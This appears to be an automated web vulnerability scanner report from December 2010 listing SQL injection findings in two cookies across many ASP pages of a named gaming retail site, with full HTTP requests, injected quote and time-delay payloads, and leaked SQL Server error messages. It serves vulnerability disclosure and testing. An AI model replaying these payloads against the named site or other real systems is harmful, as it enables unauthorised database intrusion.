The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/catalog.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:25 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:24 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/category.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:14:20 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:14:20 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/category.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:17:26 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:17:26 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/default.asp HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467; AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:28 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:28 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/default.asp HTTP/1.1 Host: www.areyougame.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LogSessionID=96699467'; AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=222988107.279130543.1293356328.1293356328.1293356328.1; __utmc=222988107; __utmb=222988107.1.10.1293356328; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:20:26 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:20:26 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/html.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:14:17 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:14:18 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/html.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:17:32 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:17:32 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/item.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:13:18 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:13:18 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the LogSessionID cookie. The application took 19958 milliseconds to respond to the request, compared with 385 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /interact/item.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467waitfor%20delay'0%3a0%3a20'--;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 16:23:19 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 373 Content-Type: text/html Expires: Mon, 31 Mar 2008 15:23:00 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e10'</font> <p> <font face="Arial" size=2>Procedure or function 'spAddLogAction' ex ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/item.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:17:14 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:17:14 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 14:42:02 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 13:42:02 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/logon.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 14:42:41 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 13:42:40 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/newsletter.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:06 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:06 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/newsletter.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:21:19 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:21:20 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/promo.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:13:22 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:13:22 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/promo.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467';
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:17:05 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 364 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:17:04 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the LogSessionID cookie. The application took 20006 milliseconds to respond to the request, compared with 387 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /interact/promo.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467waitfor%20delay'0%3a0%3a20'--;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 16:20:08 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 373 Content-Type: text/html Expires: Mon, 31 Mar 2008 15:19:48 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e10'</font> <p> <font face="Arial" size=2>Procedure or function 'spAddLogAction' ex ...[SNIP]...
The AreYouGame cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AreYouGame cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /interact/refer.asp HTTP/1.1 Host: www.areyougame.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=222988107.1293356328.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AreYouGame=SourceCode=Shopping&LogUserID=96643866'; ASPSESSIONIDQSBBDBDQ=NGEDLOLAKLIENIKMFMNJIHDH; __utma=222988107.279130543.1293356328.1293356328.1293356328.1; ASPSESSIONIDSSBBDBDQ=IGEDLOLAPCNKFGEENAIDMILM; __utmc=222988107; __utmb=222988107.1.10.1293356328; LogSessionID=96699467;
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sun, 26 Dec 2010 15:16:45 GMT p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET Connection: close Pragma: no-cache Content-Length: 395 Content-Type: text/html Expires: Mon, 31 Mar 2008 14:16:44 GMT Cache-control: no-cache
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near ', @in_log_session_id = 96699467, @in_user_id = NULL, @in_user_id_type = NULL, @in_page = '.</font> ...[SNIP]...
The LogSessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the LogSessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
